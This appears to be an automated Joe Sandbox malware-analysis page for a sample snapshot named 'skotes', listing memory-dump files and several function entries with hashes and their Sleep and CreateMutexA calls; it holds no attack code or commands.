Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5c14b9512a4ce99ae54ded7e4c099e7847e533103fd0a485b98713ad390561e5
Instruction ID: ce1f511e40e96bdbd323af4423dde61c82f3685e5c04cd201f02c9dfc3af70bb
Opcode Fuzzy Hash: 5c14b9512a4ce99ae54ded7e4c099e7847e533103fd0a485b98713ad390561e5
Instruction Fuzzy Hash: DD312631B00210DBFF08DB68ED9976DB772EFD6324F644218E014972D5D73699D08722

Function 0012A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b56089c849440e6f0a5e7d696336b985acf75d3e6df5b53b294f4003761e7277
Instruction ID: da83ed874891456161688d1854437992dd15a4c5335b48287f2e8d135e941dc4
Opcode Fuzzy Hash: b56089c849440e6f0a5e7d696336b985acf75d3e6df5b53b294f4003761e7277
Instruction Fuzzy Hash: 75313731B002409BEF08EB78E999B6DB772EFD1318F684218E4249B3D5DB7599D08762

Function 0012A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 891388b300faded00597f8ee042527e2efe0ad85a80999b8ba131bd44440c8df
Instruction ID: 579e7b8768dfb334691bd1c0462c784cb1f91c85691b8ca5f613c0b90e65e0d4
Opcode Fuzzy Hash: 891388b300faded00597f8ee042527e2efe0ad85a80999b8ba131bd44440c8df
Instruction Fuzzy Hash: 89314831B002148BEF08DB78FD99B6DB762EFC6328F648218E4149B3D5CB3599908762

Function 0012A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 69bcac3d6cdaf59478c081b13711540774f603dff43ce8c2c1dd8259c25fab29
Instruction ID: da666777bf2b924b7153d4b62529d5f36c516f35f12ec796c018a6506045fb7d
Opcode Fuzzy Hash: 69bcac3d6cdaf59478c081b13711540774f603dff43ce8c2c1dd8259c25fab29
Instruction Fuzzy Hash: DC314A71B00214CBEF08DB78ED997ADB772EFC1314F648218E0149B2D5C73659908762

Function 00129ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207127169.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207148465.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e3b38604f9c967cd56cf7b41024f66eb22352295070703966fe0102bec78f0c5
Instruction ID: 15d6da72a9e75700fd458c77d9c2e3b6e6bbcfb4b7ff84a08f019b5911c885b6
Opcode Fuzzy Hash: e3b38604f9c967cd56cf7b41024f66eb22352295070703966fe0102bec78f0c5
Instruction Fuzzy Hash: FC217631B04200DBFF189B6CFC99B6DB762EFC1315F244219F4188B2D5DB76AA908722

Function 0012A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000003.00000002.2205847431.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000003.00000002.2205824705.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205847431.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205927950.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205949385.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205971348.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2205992873.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206013842.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206148326.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206168974.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206191172.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206227856.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206247434.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206263959.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206283873.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206306918.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206329581.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206350306.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206374544.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206407250.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206432061.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206455967.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206478199.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206501746.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206522347.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206543318.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206559138.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206580726.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206602866.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206625518.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206650381.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206672970.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206696676.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206719289.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206743848.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206768099.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206803246.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206880187.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206907472.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206972970.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2206993459.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207017448.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207037413.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207059319.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207083227.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2207105093.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
